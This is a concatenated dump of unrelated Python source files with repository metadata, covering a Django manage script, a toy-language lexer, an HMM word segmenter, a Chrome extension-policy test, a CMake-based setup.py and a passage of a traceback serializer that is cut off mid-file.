| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 828
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys

if __name__ == "__main__":
    # Point Django at this project's settings module before dispatching.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "cristianoronaldoyopmailcom_307.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
|
[
"ayushpuroheet@gmail.com"
] |
ayushpuroheet@gmail.com
|
af9bfb5814f5f4141fc5fd9980c003da790129c1
|
2dbd4a34f6da93c0e70e8517971672a010db93dc
|
/py_m/lexer_.py
|
2bc01b0157aa225fd69bd537af1b174f584f269a
|
[] |
no_license
|
kawain/copy_interpreter
|
44eebe43c6b9ddefa94066577dcd5779a933f426
|
94e7a6d5d03b528b9138c17a5a6828f6332fa98d
|
refs/heads/master
| 2023-04-26T02:51:46.457263
| 2021-05-22T07:48:52
| 2021-05-22T07:48:52
| 356,544,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,363
|
py
|
from token_ import TokenType, Token
class Lexer:
    """Lexical analyzer: turns the source text into a stream of Tokens."""

    def __init__(self, input, position=0, next_position=0, ch=""):
        # input: full source text
        # position: index of the character currently held in self.ch
        # next_position: index read_char() will consume next
        # ch: current character, "" once the input is exhausted
        self.input = input
        self.position = position
        self.next_position = next_position
        self.ch = ch
        self.size = len(self.input)
        # prime self.ch with the first character (or "" for empty input)
        self.read_char()

    def read_char(self):
        # Advance one character; "" marks end of input.
        if self.next_position >= self.size:
            self.ch = ""
        else:
            self.ch = self.input[self.next_position]
        self.position = self.next_position
        self.next_position += 1

    def skip_whitespace(self):
        # Consume spaces, tabs and newlines between tokens.
        while self.ch == " " or self.ch == "\t" or self.ch == "\n" or self.ch == "\r":
            self.read_char()

    @staticmethod
    def is_letter(v):
        # Identifier characters: alphabetic or underscore.
        if v.isalpha():
            return True
        elif v == "_":
            return True
        else:
            return False

    @staticmethod
    def is_digit(v):
        # Number characters: digits or a decimal point.
        if v.isdigit():
            return True
        elif v == '.':
            return True
        else:
            return False

    def peek_char(self):
        # Look at the next character without consuming it.
        if self.next_position >= self.size:
            return ""
        else:
            return self.input[self.next_position]

    def read_identifier(self):
        # Consume a run of identifier characters and return the slice.
        position = self.position
        while self.is_letter(self.ch):
            self.read_char()
        return self.input[position:self.position]

    def read_number(self):
        # Consume a run of digits / dots and return the slice.
        position = self.position
        while self.is_digit(self.ch):
            self.read_char()
        return self.input[position:self.position]

    def read_string(self):
        # Consume up to the closing quote (or end of input); the quotes
        # themselves are excluded from the returned literal.
        position = self.position + 1
        while True:
            self.read_char()
            if self.ch == '"' or self.ch == "":
                break
        return self.input[position:self.position]

    def next_token(self):
        """Return the next Token and advance past it."""
        tok = Token()
        self.skip_whitespace()
        if self.ch == "=":
            # one-character lookahead distinguishes "=" from "=="
            if self.peek_char() == "=":
                self.read_char()
                tok.token_type = TokenType.EQ
                tok.literal = "=="
            else:
                tok.token_type = TokenType.ASSIGN
                tok.literal = "="
        elif self.ch == "+":
            tok.token_type = TokenType.PLUS
            tok.literal = self.ch
        elif self.ch == "-":
            tok.token_type = TokenType.MINUS
            tok.literal = self.ch
        elif self.ch == "!":
            # one-character lookahead distinguishes "!" from "!="
            if self.peek_char() == "=":
                self.read_char()
                tok.token_type = TokenType.NOT_EQ
                tok.literal = "!="
            else:
                tok.token_type = TokenType.BANG
                tok.literal = "!"
        elif self.ch == "/":
            tok.token_type = TokenType.SLASH
            tok.literal = self.ch
        elif self.ch == "*":
            tok.token_type = TokenType.ASTERISK
            tok.literal = self.ch
        elif self.ch == "<":
            tok.token_type = TokenType.LT
            tok.literal = self.ch
        elif self.ch == ">":
            tok.token_type = TokenType.GT
            tok.literal = self.ch
        elif self.ch == ";":
            tok.token_type = TokenType.SEMICOLON
            tok.literal = self.ch
        elif self.ch == ",":
            tok.token_type = TokenType.COMMA
            tok.literal = self.ch
        elif self.ch == "{":
            tok.token_type = TokenType.LBRACE
            tok.literal = self.ch
        elif self.ch == "}":
            tok.token_type = TokenType.RBRACE
            tok.literal = self.ch
        elif self.ch == "(":
            tok.token_type = TokenType.LPAREN
            tok.literal = self.ch
        elif self.ch == ")":
            tok.token_type = TokenType.RPAREN
            tok.literal = self.ch
        elif self.ch == '"':
            tok.token_type = TokenType.STRING
            tok.literal = self.read_string()
        elif self.ch == "[":
            tok.token_type = TokenType.LBRACKET
            tok.literal = self.ch
        elif self.ch == "]":
            tok.token_type = TokenType.RBRACKET
            tok.literal = self.ch
        elif self.ch == "":
            tok.token_type = TokenType.EOF
            tok.literal = ""
        else:
            if self.is_letter(self.ch):
                # keywords vs identifiers resolved via lookup_ident;
                # read_identifier already consumed the chars, so return now
                tok.literal = self.read_identifier()
                tok.token_type = tok.lookup_ident(tok.literal)
                return tok
            elif self.is_digit(self.ch):
                # zero dots -> INT, one dot -> FLOAT, more -> ILLEGAL
                literal = self.read_number()
                if literal.count(".") == 0:
                    tok.token_type = TokenType.INT
                    tok.literal = literal
                    return tok
                elif literal.count(".") == 1:
                    tok.token_type = TokenType.FLOAT
                    tok.literal = literal
                    return tok
                else:
                    tok.token_type = TokenType.ILLEGAL
                    tok.literal = literal
            else:
                tok.token_type = TokenType.ILLEGAL
                tok.literal = self.ch
        self.read_char()
        return tok

    def __str__(self):
        return "Lexer()"
if __name__ == "__main__":
pass
|
[
"unknown@example.com"
] |
unknown@example.com
|
e96605d4527a4551d1105f8932434a99310e65b9
|
561c590ec93131ceb58c21912a375b6e0d50bedb
|
/jiang_fenci/hmm_segment/segment/model.py
|
f02feafaf66f8f9e98368fd143fd2570a3590bb7
|
[] |
no_license
|
chuanfanyoudong/nlp_learn
|
3607555e59789240afd6c4a9620cc6e678e0afb3
|
9fbb6781640ab9aba561dc2de0066a1f1e5882a0
|
refs/heads/master
| 2020-04-07T13:25:16.118562
| 2019-04-24T07:18:33
| 2019-04-24T07:18:33
| 158,406,684
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,045
|
py
|
# -*- coding: utf-8 -*-
"""
SEGMENT
--------
封装hmm分词模型
"""
import numpy as np
from hmmlearn.hmm import MultinomialHMM
from jiang_fenci.hmm_segment.segment.corpus import get_corpus
__model = None
class Segment:
    """HMM-based Chinese word segmenter built on hmmlearn.

    Hidden states are the standard S/B/M/E character tags (Single word,
    Begin, Middle, End); probabilities come from the training corpus.
    """

    def __init__(self):
        self.corpus = get_corpus()
        self.states, self.init_p = self.get_init_state()
        self.trans_p = self.get_trans_state()
        self.vocabs, self.emit_p = self.get_emit_state()
        self.model = self.get_model()

    def get_init_state(self):
        """
        Fetch the initial-state probabilities and convert them into the
        array form the HMM model accepts.
        """
        states = ['S', 'B', 'M', 'E']
        init_state = self.corpus.get_state('init')
        init_p = np.array([init_state[s] for s in states])
        return states, init_p

    def get_trans_state(self):
        """
        Fetch the state-transition probabilities and convert them into the
        matrix form the HMM model accepts.
        """
        trans_state = self.corpus.get_state('trans')
        trans_p = np.array([[trans_state[s][ss] for ss in self.states] for s in self.states])
        return trans_p

    def get_emit_state(self):
        """
        Fetch the emission probabilities and convert them into the matrix
        form the HMM model accepts; also returns the vocabulary order used
        for the matrix columns.
        """
        emit_state = self.corpus.get_state('emit')
        vocabs = []
        for s in self.states:
            vocabs.extend([k for k, v in emit_state[s].items()])
        vocabs = list(set(vocabs))
        emit_p = np.array([[emit_state[s][w] for w in vocabs] for s in self.states])
        return vocabs, emit_p

    def get_model(self):
        """
        Initialize the hmm model with the precomputed probabilities.
        """
        model = MultinomialHMM(n_components=len(self.states))
        model.startprob_ = self.init_p
        model.transmat_ = self.trans_p
        model.emissionprob_ = self.emit_p
        return model

    def pre_process(self, word):
        """
        Unknown-character handling: out-of-vocabulary characters are mapped
        to the last vocabulary index.
        """
        if word in self.vocabs:
            return self.vocabs.index(word)
        else:
            return len(self.vocabs)-1

    def cut(self, sentence):
        """
        Segment a sentence: Viterbi-decode the S/B/M/E tag sequence and
        insert a space after every S or E character.
        """
        seen_n = np.array([[self.pre_process(w) for w in sentence]]).T
        log_p, b = self.model.decode(seen_n, algorithm='viterbi')
        states = list(map(lambda x: self.states[int(x)], b))
        cut_sentence = ''
        for index in range(len(list(states))):
            if list(states)[index] in ('S', 'E'):
                cut_sentence += sentence[index]+' '
            else:
                cut_sentence += sentence[index]
        return cut_sentence

    @staticmethod
    def stats(cut_corpus, gold_corpus):
        """
        Precision, recall and F1 over whitespace-delimited words.
        """
        success_count = 0
        cut_count = 0
        gold_count = 0
        for index in range(len(cut_corpus)):
            cut_sentence = cut_corpus[index].split(' ')
            gold_sentence = gold_corpus[index].split(' ')
            cut_count += len(cut_sentence)
            gold_count += len(gold_sentence)
            # NOTE(review): membership test, not positional alignment — a
            # word is counted correct if it appears anywhere in the gold line.
            for word in cut_sentence:
                if word in gold_sentence:
                    success_count += 1
        recall = float(success_count)/float(gold_count)
        precision = float(success_count)/float(cut_count)
        f1 = (2*recall*precision)/(recall+precision)
        return [precision, recall, f1]

    def test(self):
        """
        Segmentation evaluation: cut the test corpus and score it against
        the gold corpus; returns [precision, recall, f1].
        """
        test_corpus = self.corpus.get_test_corpus('test')
        gold_corpus = [sentence.replace('  ', ' ').strip() for sentence in self.corpus.get_test_corpus('test_gold') if sentence]
        cut_corpus = [self.cut(sentence).strip() for sentence in test_corpus if sentence]
        result = self.stats(cut_corpus, gold_corpus)
        return result
def get_model():
    """
    Singleton accessor: build the module-wide Segment on first use and
    return the same instance thereafter.
    """
    global __model
    if __model is None:
        __model = Segment()
    return __model
|
[
"qaz3762541@163.com"
] |
qaz3762541@163.com
|
a6c3cf2f1f9a3458d0b562aef5935f76de142de7
|
1956883d52e4019bbf8bd7bbc3744cdd1376e128
|
/abutton.py
|
96ea6f9b2354e36232ba86e55ad6e83e85bbaeda
|
[
"MIT"
] |
permissive
|
Otumian-empire/tkinter-basic-gui
|
5d7f7c697e9ac40f34b598b166186733d0931202
|
8a561fde8f770119bc3108511388371b1bdcabf5
|
refs/heads/master
| 2020-06-18T13:41:17.248470
| 2019-07-15T18:51:40
| 2019-07-15T18:51:40
| 196,320,911
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 378
|
py
|
from tkinter import *

root = Tk()

# Shared counter shown in the label; mutated by the two button callbacks.
x = 0


def increase():
    """Button callback: bump the counter and refresh the label text."""
    global x
    x += 1
    label.configure(text=x)


def decrease():
    """Button callback: drop the counter and refresh the label text."""
    global x
    x -= 1
    label.configure(text=x)


# Build the three widgets and stack them: button, label, button.
label = Label(text=x)
sendbutton = Button(text="increase", command=increase)
deletebutton = Button(text="decrease", command=decrease)
sendbutton.grid()
label.grid()
deletebutton.grid()
mainloop()
|
[
"popecan1000@gmail.com"
] |
popecan1000@gmail.com
|
47e01a8d79922beb1795fe91191db98c2627286b
|
61a8f496dbe1880398b0156940b1789ddfe8e081
|
/Week_7_Lab/Advanced/q10.py
|
3c2bfdedd51b4b0239a8993191d0ee3ac329def6
|
[] |
no_license
|
luca2849/CM1103-Problem-Solving-With-Python
|
e369cdc032249e3625ae5dbbd926703e20d11dd9
|
a10b7ee6b972b23528a983dd7fff78d097c08465
|
refs/heads/master
| 2020-04-04T15:07:01.179113
| 2018-12-13T12:07:19
| 2018-12-13T12:07:19
| 156,024,862
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 441
|
py
|
def rec_power(a, n):
    """Return a**n for a non-negative integer n by recursive squaring.

    Uses O(log n) multiplications: a**n == (a**(n//2))**2, times one
    extra factor of a when n is odd.

    Bug fix vs. the original: it halved with float division (n = n/2)
    and then tested (n/2) % 2, which for e.g. n == 2 evaluates to 0.5 —
    neither 0 nor 1 — so the function fell through, returned None, and
    the recursion crashed with a TypeError.
    """
    # base cases: a**0 == 1 (also generalizes the function to n == 0), a**1 == a
    if n == 0:
        return 1
    if n == 1:
        return a
    # compute a**(n//2) once and reuse it
    factor = rec_power(a, n // 2)
    if n % 2 == 0:
        # even exponent: square the half power
        return factor * factor
    # odd exponent: square the half power and multiply by a once more
    return factor * factor * a


print(rec_power(10, 4))
|
[
"="
] |
=
|
af8010a1e412e867091d19bae06ae1b90c345783
|
f993e252fc740471e71a6748685988fc0b5f2e34
|
/backend/driver/migrations/0001_initial.py
|
66dea496859c52c65d3e087e3245db062a3abc77
|
[] |
no_license
|
crowdbotics-apps/cobros-app-22778
|
b9b9561d693fc979de0af693ffa9e4ca4d57873d
|
0774fc76d1b8b484790ed1ec070c1f6455905c65
|
refs/heads/master
| 2023-01-12T16:46:05.469345
| 2020-11-19T17:57:14
| 2020-11-19T17:57:14
| 314,314,056
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,540
|
py
|
# Generated by Django 2.2.17 on 2020-11-19 17:02
# NOTE: auto-generated migration — edit via new migrations, not in place.

from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion


class Migration(migrations.Migration):
    # First migration of the driver app: creates DriverProfile (1:1 with the
    # auth user) and DriverOrder (links a profile to a delivery order).

    initial = True

    dependencies = [
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        ("delivery_order", "0001_initial"),
    ]

    operations = [
        migrations.CreateModel(
            name="DriverProfile",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("photo", models.URLField()),
                ("timestamp_created", models.DateTimeField(auto_now_add=True)),
                ("last_updated", models.DateTimeField(auto_now=True)),
                ("details", models.TextField(blank=True, null=True)),
                (
                    "user",
                    models.OneToOneField(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="driverprofile_user",
                        to=settings.AUTH_USER_MODEL,
                    ),
                ),
            ],
        ),
        migrations.CreateModel(
            name="DriverOrder",
            fields=[
                (
                    "id",
                    models.AutoField(
                        auto_created=True,
                        primary_key=True,
                        serialize=False,
                        verbose_name="ID",
                    ),
                ),
                ("timestamp_created", models.DateTimeField(auto_now_add=True)),
                (
                    "driver",
                    models.ForeignKey(
                        blank=True,
                        null=True,
                        on_delete=django.db.models.deletion.SET_NULL,
                        related_name="driverorder_driver",
                        to="driver.DriverProfile",
                    ),
                ),
                (
                    "order",
                    models.OneToOneField(
                        on_delete=django.db.models.deletion.CASCADE,
                        related_name="driverorder_order",
                        to="delivery_order.Order",
                    ),
                ),
            ],
        ),
    ]
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
4c5aa5950353440cacb41eae8812b9ebad525a8f
|
536656cd89e4fa3a92b5dcab28657d60d1d244bd
|
/chrome/test/enterprise/e2e/policy/extension_blacklist/extension_blacklist.py
|
d14b00fa20cb00fb2767361a0b60407fe2824f33
|
[
"BSD-3-Clause"
] |
permissive
|
ECS-251-W2020/chromium
|
79caebf50443f297557d9510620bf8d44a68399a
|
ac814e85cb870a6b569e184c7a60a70ff3cb19f9
|
refs/heads/master
| 2022-08-19T17:42:46.887573
| 2020-03-18T06:08:44
| 2020-03-18T06:08:44
| 248,141,336
| 7
| 8
|
BSD-3-Clause
| 2022-07-06T20:32:48
| 2020-03-18T04:52:18
| null |
UTF-8
|
Python
| false
| false
| 2,267
|
py
|
# Copyright 2019 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import os
from chrome_ent_test.infra.core import environment, before_all, test
from infra import ChromeEnterpriseTestCase
@environment(file="../policy_test.asset.textpb")
class ExtensionInstallBlacklistTest(ChromeEnterpriseTestCase):
  """Test the ExtensionInstallBlacklist policy.

  https://cloud.google.com/docs/chrome-enterprise/policies/?policy=ExtensionInstallBlacklist"""

  @before_all
  def setup(self):
    # Provision the client VM with Chrome and the webdriver harness once.
    self.InstallChrome('client2012')
    self.InstallWebDriver('client2012')

  def installExtension(self, url):
    """Open the webstore page at *url* via webdriver and return the page text."""
    args = ['--url', url, '--text_only', '--wait', '5']
    dir = os.path.dirname(os.path.abspath(__file__))
    logging.info('Opening page: %s' % url)
    output = self.RunWebDriverTest('client2012',
                                   os.path.join(dir, '../install_extension.py'),
                                   args)
    return output

  @test
  def test_ExtensionBlacklist_all(self):
    # Wildcard entry blocks installation of every extension.
    extension = '*'
    self.SetPolicy('win2012-dc', r'ExtensionInstallBlacklist\1', extension,
                   'String')
    self.RunCommand('client2012', 'gpupdate /force')
    logging.info('Disabled extension install for ' + extension)
    test_url = 'https://chrome.google.com/webstore/detail/google-hangouts/nckgahadagoaajjgafhacjanaoiihapd'
    output = self.installExtension(test_url)
    self.assertIn('blocked', output)

  @test
  def test_ExtensionBlacklist_hangout(self):
    # Blocking a single extension id must not affect other extensions.
    extension = 'nckgahadagoaajjgafhacjanaoiihapd'
    self.SetPolicy('win2012-dc', r'ExtensionInstallBlacklist\1', extension,
                   'String')
    self.RunCommand('client2012', 'gpupdate /force')
    logging.info('Disabled extension install for ' + extension)
    test_url = 'https://chrome.google.com/webstore/detail/google-hangouts/nckgahadagoaajjgafhacjanaoiihapd'
    output = self.installExtension(test_url)
    self.assertIn('blocked', output)

    # A different (non-listed) extension should still install.
    positive_test_url = 'https://chrome.google.com/webstore/detail/grammarly-for-chrome/kbfnbcaeplbcioakkpcpgfkobkghlhen'
    output = self.installExtension(positive_test_url)
    self.assertNotIn('blocked', output)
|
[
"pcding@ucdavis.edu"
] |
pcding@ucdavis.edu
|
365f109ecdc7bef348e0afda449d6ff9c1423a44
|
0892937e1ef77f110a05042fa49b9178221590a5
|
/quiz_app/admin.py
|
c54e0446c5f2b40a946d0f3ec5d7d08897fbfaa7
|
[] |
no_license
|
dmswl0311/nh_hackathon_quiz
|
aa2e0cc51db3abe45bdb6aadb96855528a149d63
|
c4fadf6a9249d6e8ad80d553f8c20a848bdfc851
|
refs/heads/master
| 2023-01-29T15:46:22.046038
| 2020-12-13T13:35:46
| 2020-12-13T13:35:46
| 320,609,628
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 128
|
py
|
from django.contrib import admin

from .models import Quiz, OX_Quiz

# Expose both quiz models in the Django admin site with default options.
admin.site.register(Quiz)
admin.site.register(OX_Quiz)
|
[
"dmswl_0311@naver.com"
] |
dmswl_0311@naver.com
|
d06ba3a39c1339b3301e652807885c2348d249aa
|
75f3ddcebb39e1575d0e735090cbafae5bc05140
|
/setup.py
|
7d957bf60b9cd3b0c319e27de4efb82b1d33cecc
|
[
"BSD-3-Clause"
] |
permissive
|
ethen8181/ort_inference
|
372b548e98f4e6e6e5fde2bf5533a31c6e6273ce
|
2fdd7fe8479c4b8679f8e809fa2b3846ad96b3fe
|
refs/heads/main
| 2023-05-15T07:42:48.247881
| 2021-06-21T04:30:06
| 2021-06-21T04:30:06
| 376,840,702
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,471
|
py
|
# -*- coding: utf-8 -*-
import os
import sys
import subprocess
from setuptools import setup, Extension
from setuptools.command.build_ext import build_ext
# Convert distutils Windows platform specifiers to CMake -A arguments
PLAT_TO_CMAKE = {
"win32": "Win32",
"win-amd64": "x64",
"win-arm32": "ARM",
"win-arm64": "ARM64",
}
# A CMakeExtension needs a sourcedir instead of a file list.
# The name must be the _single_ output extension from the CMake build.
# If you need multiple extensions, see scikit-build.
class CMakeExtension(Extension):
    """A setuptools Extension whose build is delegated to a CMake source dir."""

    def __init__(self, name, sourcedir=""):
        # No source file list: CMake itself produces the single output
        # extension named *name*.
        super().__init__(name, sources=[])
        self.sourcedir = os.path.abspath(sourcedir)
class CMakeBuild(build_ext):
    """build_ext subclass that configures and builds each CMakeExtension via cmake."""

    def build_extension(self, ext):
        # Final directory where the compiled extension must land.
        extdir = os.path.abspath(os.path.dirname(self.get_ext_fullpath(ext.name)))

        # required for auto-detection of auxiliary "native" libs
        if not extdir.endswith(os.path.sep):
            extdir += os.path.sep

        cfg = "Debug" if self.debug else "Release"

        # CMake lets you override the generator - we need to check this.
        # Can be set with Conda-Build, for example.
        cmake_generator = os.environ.get("CMAKE_GENERATOR", "")

        # Set Python_EXECUTABLE instead if you use PYBIND11_FINDPYTHON
        # EXAMPLE_VERSION_INFO shows you how to pass a value into the C++ code
        # from Python.
        cmake_args = [
            "-DCMAKE_LIBRARY_OUTPUT_DIRECTORY={}".format(extdir),
            "-DPYTHON_EXECUTABLE={}".format(sys.executable),
            "-DEXAMPLE_VERSION_INFO={}".format(self.distribution.get_version()),
            "-DCMAKE_BUILD_TYPE={}".format(cfg),  # not used on MSVC, but no harm
        ]
        build_args = []

        if self.compiler.compiler_type != "msvc":
            # Using Ninja-build since it a) is available as a wheel and b)
            # multithreads automatically. MSVC would require all variables be
            # exported for Ninja to pick it up, which is a little tricky to do.
            # Users can override the generator with CMAKE_GENERATOR in CMake
            # 3.15+.
            if not cmake_generator:
                cmake_args += ["-GNinja"]
        else:
            # Single config generators are handled "normally"
            single_config = any(x in cmake_generator for x in {"NMake", "Ninja"})

            # CMake allows an arch-in-generator style for backward compatibility
            contains_arch = any(x in cmake_generator for x in {"ARM", "Win64"})

            # Specify the arch if using MSVC generator, but only if it doesn't
            # contain a backward-compatibility arch spec already in the
            # generator name.
            if not single_config and not contains_arch:
                cmake_args += ["-A", PLAT_TO_CMAKE[self.plat_name]]

            # Multi-config generators have a different way to specify configs
            if not single_config:
                cmake_args += [
                    "-DCMAKE_LIBRARY_OUTPUT_DIRECTORY_{}={}".format(cfg.upper(), extdir)
                ]
                build_args += ["--config", cfg]

        # Set CMAKE_BUILD_PARALLEL_LEVEL to control the parallel build level
        # across all generators.
        if "CMAKE_BUILD_PARALLEL_LEVEL" not in os.environ:
            # self.parallel is a Python 3 only way to set parallel jobs by hand
            # using -j in the build_ext call, not supported by pip or PyPA-build.
            if hasattr(self, "parallel") and self.parallel:
                # CMake 3.12+ only.
                build_args += ["-j{}".format(self.parallel)]

        if not os.path.exists(self.build_temp):
            os.makedirs(self.build_temp)

        # Configure step, then build step, both inside the temp build tree.
        subprocess.check_call(
            ["cmake", ext.sourcedir] + cmake_args, cwd=self.build_temp
        )
        subprocess.check_call(
            ["cmake", "--build", "."] + build_args, cwd=self.build_temp
        )
# The information here can also be placed in setup.cfg - better separation of
# logic and declaration, and simpler if you include description/version in a file.
setup(
name="ort_inference",
version="0.0.1",
author="MingYu (Ethen) Liu",
author_email="ethen8181@gmail.com",
description="CPU Inferencing with Onnxruntime",
long_description="CPU Inferencing with Onnxruntime",
ext_modules=[CMakeExtension("ort_inference")],
cmdclass={"build_ext": CMakeBuild},
zip_safe=False
)
|
[
"ethen8181@gmail.com"
] |
ethen8181@gmail.com
|
494cf359b8f1efd02f67635b8b12933e562d71b4
|
c106149cccfac8dd4f05f976253f529b3234828c
|
/zerver/management/commands/send_realm_reactivation_email.py
|
39b1dd91a654be9dba3474577f165a89b79bc915
|
[
"Apache-2.0",
"LicenseRef-scancode-free-unknown"
] |
permissive
|
kartikey54/zulip
|
cc685686af3bc1fbadc9ded260f62f45087df301
|
e8b44f491f8967823273a6d5acd3d3d376e62b90
|
refs/heads/master
| 2021-01-23T02:59:24.396882
| 2019-10-08T19:46:43
| 2019-10-08T19:46:43
| 86,029,881
| 1
| 0
|
Apache-2.0
| 2019-10-08T19:46:44
| 2017-03-24T05:16:51
|
Python
|
UTF-8
|
Python
| false
| false
| 805
|
py
|
from argparse import ArgumentParser
from zerver.lib.management import ZulipBaseCommand, CommandError
from zerver.lib.send_email import send_email, FromAddress
from zerver.lib.actions import do_send_realm_reactivation_email
from typing import Any
class Command(ZulipBaseCommand):
    help = """Sends realm reactivation email to admins"""

    def add_arguments(self, parser: ArgumentParser) -> None:
        # second argument True marks the realm option as required
        self.add_arguments = self.add_realm_args(parser, True) if False else self.add_realm_args(parser, True)

    def handle(self, *args: Any, **options: str) -> None:
        realm = self.get_realm(options)
        assert realm is not None  # realm is a required argument, so get_realm cannot return None
        if not realm.deactivated:
            raise CommandError("The realm %s is already active." % (realm.name,))
        print('Sending email to admins')
        do_send_realm_reactivation_email(realm)
        print('Done!')
|
[
"tabbott@zulipchat.com"
] |
tabbott@zulipchat.com
|
35dfc784fce1e1f84a5c902dfaad6aa13b45a15b
|
b7f9d32bfd0ba147182a880de9b257355d3bc945
|
/pyedi/grammar/jsonnocheck.py
|
28444610964efc57bb6f31665ff2ce012f9fe561
|
[] |
no_license
|
jedrus2000/pyedi
|
25cbb930d854e0dbe79d251b3215040c978410b2
|
b5d291c5f8565137bb845835c8fe439730b2f2c7
|
refs/heads/master
| 2020-04-12T09:15:58.802275
| 2018-12-19T07:16:55
| 2018-12-19T07:16:55
| 162,396,916
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,690
|
py
|
"""
This is modified code of Bots project:
http://bots.sourceforge.net/en/index.shtml
ttp://bots.readthedocs.io
https://github.com/eppye-bots/bots
originally created by Henk-Jan Ebbers.
This code include also changes from other forks, specially from:
https://github.com/bots-edi
This project, as original Bots is licenced under GNU GENERAL PUBLIC LICENSE Version 3; for full
text: http://www.gnu.org/copyleft/gpl.html
"""
from .json import Json
class JsonNoCheck(Json):
    """JSON grammar variant with structure checking disabled.

    Compared to the base Json grammar: unknown entities are allowed
    (checkunknownentities=False) and no record structure is read or
    enforced (has_structure=False, checkcollision=False).
    """
    defaultsyntax = {
        "charset": "utf-8",
        "checkcharsetin": "strict",  # strict, ignore or botsreplace (replace with char as set in bots.ini).
        "checkcharsetout": "strict",  # strict, ignore or botsreplace (replace with char as set in bots.ini).
        "checkunknownentities": False,
        "contenttype": "application/json",
        "decimaal": ".",
        "defaultBOTSIDroot": "ROOT",
        "envelope": "",
        "indented": False,  # False: output is one string (no cr/lf); True: output is indented/human readable
        "merge": False,
        "triad": "",
        # settings needed as defaults, but not useful for this editype
        "add_crlfafterrecord_sep": "",
        "escape": "",
        "field_sep": "",
        "forcequote": 0,  # csv only
        "quote_char": "",
        "record_sep": "",
        "record_tag_sep": "",  # Tradacoms/GTDI
        "reserve": "",
        "sfield_sep": "",
        "skip_char": "",
        # bots internal, never change/overwrite
        "has_structure": False,  # is True, read structure, recorddef, check these
        "checkcollision": False,
        "lengthnumericbare": False,
        "stripfield_sep": False,
    }
|
[
"a.barganski@gmail.com"
] |
a.barganski@gmail.com
|
28642c224abb07f03d6e3c0002d570ec3095e530
|
8eab8ab725c2132bb8d090cdb2d23a5f71945249
|
/virt/Lib/site-packages/stack_data/serializing.py
|
fb67d2906a1d42c448f6b8f99c6e470900813a01
|
[
"MIT"
] |
permissive
|
JoaoSevergnini/metalpy
|
6c88a413a82bc25edd9308b8490a76fae8dd76ca
|
c2d0098a309b6ce8c756ff840bfb53fb291747b6
|
refs/heads/main
| 2023-04-18T17:25:26.474485
| 2022-09-18T20:44:45
| 2022-09-18T20:44:45
| 474,773,752
| 3
| 1
|
MIT
| 2022-11-03T20:07:50
| 2022-03-27T22:21:01
|
Python
|
UTF-8
|
Python
| false
| false
| 6,441
|
py
|
import inspect
import logging
import sys
import traceback
from collections import Counter
from html import escape as escape_html
from types import FrameType, TracebackType
from typing import Union, Iterable, List
from stack_data import (
style_with_executing_node,
Options,
Line,
FrameInfo,
Variable,
RepeatedFrames,
)
log = logging.getLogger(__name__)
class Serializer:
    """Serialize exceptions and stacks (via stack_data) into plain dicts.

    Subclasses may override hooks such as ``should_include_frame`` and
    ``format_variable_value`` to filter frames or customize rendering.
    """
    def __init__(
        self,
        *,
        options=None,
        pygmented=False,
        show_executing_node=True,
        pygments_formatter_cls=None,
        pygments_formatter_kwargs=None,
        pygments_style="monokai",
        executing_node_modifier="bg:#005080",
        use_code_qualname=True,
        strip_leading_indent=True,
        html=False,
        chain=True,
        collapse_repeated_frames=True,
        show_variables=False,
    ):
        if options is None:
            options = Options()
        # Only build a pygments formatter when highlighting is requested and
        # the caller did not already attach one to the options object.
        if pygmented and not options.pygments_formatter:
            if show_executing_node:
                # Overlay a background color on the style to mark the node
                # currently being executed.
                pygments_style = style_with_executing_node(
                    pygments_style, executing_node_modifier
                )
            if pygments_formatter_cls is None:
                # Pick HTML or 256-color terminal formatter based on output mode.
                if html:
                    from pygments.formatters.html import (
                        HtmlFormatter as pygments_formatter_cls,
                    )
                else:
                    from pygments.formatters.terminal256 import (
                        Terminal256Formatter as pygments_formatter_cls,
                    )
            options.pygments_formatter = pygments_formatter_cls(
                style=pygments_style,
                **pygments_formatter_kwargs or {},
            )
        self.pygmented = pygmented
        self.use_code_qualname = use_code_qualname
        self.strip_leading_indent = strip_leading_indent
        self.html = html
        self.chain = chain
        self.options = options
        self.collapse_repeated_frames = collapse_repeated_frames
        self.show_variables = show_variables
    def format_exception(self, e=None) -> List[dict]:
        """Format ``e`` (default: the active exception) as a list of parts,
        following the ``__cause__``/``__context__`` chain oldest-first when
        ``self.chain`` is true."""
        if e is None:
            e = sys.exc_info()[1]
        result = []
        if self.chain:
            # NOTE(review): relies on private traceback._cause_message /
            # _context_message to mirror the stdlib's chaining wording.
            if e.__cause__ is not None:
                result = self.format_exception(e.__cause__)
                result[-1]["tail"] = traceback._cause_message.strip()
            elif e.__context__ is not None and not e.__suppress_context__:
                result = self.format_exception(e.__context__)
                result[-1]["tail"] = traceback._context_message.strip()
        result.append(self.format_traceback_part(e))
        return result
    def format_traceback_part(self, e: BaseException) -> dict:
        """Format one exception (its frames plus type/message) as a dict."""
        return dict(
            frames=self.format_stack(e.__traceback__ or sys.exc_info()[2]),
            exception=dict(
